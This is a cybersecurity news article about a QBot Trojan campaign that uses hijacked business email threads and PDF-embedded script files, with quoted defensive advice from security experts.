QBot Expands Initial Access Malware Strategy With PDF-WSF Combo

The infamous Trojan's operators are switching up tactics with the use of simulated business correspondence, which helps instill trust with intended victims, and a stealthier payload.

4 Min Read
computer safety concept, trojan horse in electronic environment.
Source: the lightwriter via Alamy Stock Photo

A recent surge in QBot Trojan attacks has been observed, spreading via malicious emails written in various languages, including English, German, Italian, and French. The emails are crafted using genuine business letters obtained by the attackers and urge the recipient to open an attached PDF file, which contains several layers of obfuscation that make its maliciousness less detectable by security tools.

According to an analysis by Kaspersky this week, the campaign also uses the method of using reply-chain emails to make it more difficult for soon-to-be-victims to flag as malicious. As the name suggests, reply chain is the practice of accessing existing email exchanges from a listserv (or any location) and replying to them, making the interloping messages look legit, less suspicious, and believable.

The campaign represents a change in tactics for the operators of QBot (aka QakBot or Pinkslipbot), who maintain an access-as-a-service offering that other cybercriminals use to deliver a range of second-stage malware to already-compromised targets. Initially discovered in 2007, QBot has undergone numerous modifications and enhancements over the years, resulting in its widespread distribution as one of the most actively propagated malware strains in 2020. 

These latest improvements help boost stealth and legitimacy, according to security researchers. For instance, the emails are crafted to change only minimal parts of the stolen documents; they may contain links or attachments that contain links to malicious sites.

"The messages were based on real business letters the attackers had gotten access to, which afforded them the opportunity to join the correspondence thread with messages of their own," the Kaspersky report noted.

QBot's Many Layers of Obfuscation

As for attack flow, the PDF file contains a Windows Script File (WSF) that harbors an obfuscated PowerShell script encoded into a Base64 line. Once the PowerShell script is covertly executed on the computer, it utilizes the wget utility to retrieve a DLL file from a remote server, which is used to deliver the QBot malware to the victim's computer. This is an existing tactic: Last year, QBot operators began using DLL sideloading to deliver malware, a technique that places legitimate and malicious files together in a common directory to avoid detection. 

The group has recently ramped up its operations and improved their offerings, infecting systems, installing attack frameworks, and selling access to other groups, including Black Basta.

"The WSF is obfuscated to evade detection which will download further payloads," explains Timothy Morris, chief security adviser at Tanium. "The attack 'chaining', or using multiple steps, helps get past some protections since the full context of the nefarious behavior can't be observed as a single activity."

How to Protect the Business From QBot Attacks

Morris notes that the multiple phases in the attack flow, from the initial emails to payloads being downloaded to data exfiltration and theft requires a range of cybersecurity strategies to defend against.

"It is important to have a defense-in-depth strategy that includes detection, monitoring, and protection technologies at the endpoint, as well as Web, network, and email security that is up to date," he says. "Also, training users to these types of threats is important."

Darren Guccione, CEO and co-founder at Keeper Security, says potential targets should also be trained to recognize that, unlike phishing attempts that appear to come from random businesses or the government, the malicious file containing malware will appear to come from someone you've had past email conversations with.

"The threat actors hope to piggyback on your relationship and level of trust to get these contacts to download the files," he explains. "Employees should avoid making risky clicks. Suspicious links should not be clicked and untrusted software should not be installed."

Other email security best practices include verifying the email sender and content before downloading attachments, and hovering over embedded links to see the actual target URL. Also, defenders also should focus on making sure antivirus and anti-malware solutions are deployed and up to date, and secure endpoints, including PCs, servers, routers, and so on, keeping them patched.

Guccione says the latest resurgence of QBot, along with new modules and evasion techniques being added, indicates active development of the malware, so companies should be vigilant when it comes to being prepared for the latest changes.

"It’s still a very capable adversary tool that defenders need to protect against," Guccione explains.

About the Author(s)

Nathan Eddy, Contributing Writer

Nathan Eddy is a freelance journalist and award-winning documentary filmmaker specializing in IT security, autonomous vehicle technology, customer experience technology, and architecture and urban planning. A graduate of Northwestern University’s Medill School of Journalism, Nathan currently lives in Berlin, Germany.

Keep up with the latest cybersecurity threats, newly discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

You May Also Like

More Insights